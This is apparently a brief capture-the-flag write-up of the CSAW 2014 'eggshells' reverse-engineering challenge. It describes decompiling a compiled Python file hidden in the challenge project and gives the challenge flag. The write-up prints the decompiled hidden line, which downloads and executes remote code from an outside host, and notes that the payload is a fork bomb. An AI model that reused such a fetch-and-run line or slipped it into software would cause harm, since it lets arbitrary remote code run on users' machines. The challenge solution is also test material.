Here is the link of the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/
The question is :
I trust people on the internet all the time, do you? Written by ColdHeat
The question doesn’t give you any kind of hint when you first try to solve it but when you finally see the result it makes some sense to you 🙂
First when you unzip the file you get two directories named as “eggshells-master” and “__MACOSX” here are the screenshots of the directories of the both the folders.
The source code of all other files except the utilys.pyc file which is a python compiled file you can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ) which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2) or what ever which can decompile python 2.7 file 🙂
If you decompile the file here is the code that you get:
[code language=”python”]
exec __import__(‘urllib2’).urlopen(‘http://kchung.co/lol.py’).read()
[/code]
Don’t be in a hurry and just run the code as it is a fork bomb 🙂
here you get the flag : flag{trust_is_risky}
Now you get why the question is like that 🙂
